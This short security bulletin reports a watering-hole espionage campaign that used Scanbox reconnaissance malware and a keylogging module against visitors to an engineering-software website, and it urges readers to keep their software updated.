In this period we have noted a new cyber espionage campaign targeting simulation and system engineering software used the automotive, aerospace and manufacturing industries. The campaign was detected after security researchers noted that a popular website associated with the software had been compromised in a watering hole attack. These attacks compromise a popular website site in order to infect visitors’ computers with malware. Attackers often target industry specific websites in order to compromise users working for targeted companies.
The new campaign utilises a suite of reconnaissance malware known as Scanbox to target an individual’s computer through the popular Internet Explorer 8 web browser. The malware scans the computer reports on the system’s cyber defences to a command and control server utilised by the attackers. The system also allows attackers to conduct reconnaissance on the versions of popular software being run on the affected machine, including Adobe Flash, Microsoft Office, Acrobat Reader and Java, with a view to detecting further vulnerabilities. A keylogging module allows the attackers to monitor the user’s activity on websites, potentially including Personally Identifiable Information (PII) and system login details.
The sophistication of the malware and the attack method suggests that it is the work of a state sponsored cyber group, who are engaged in long term espionage against firms in the affected industries. The incident highlights the continuing popularity of watering hole attacks, which is arguably a response to computer user’s increasing awareness of malware attachments sent via email. The campaign, likely to be one of many currently targeting Western business interests, also highlights the importance of updating corporate and personal software, and ensuring that robust cyber defences are in place.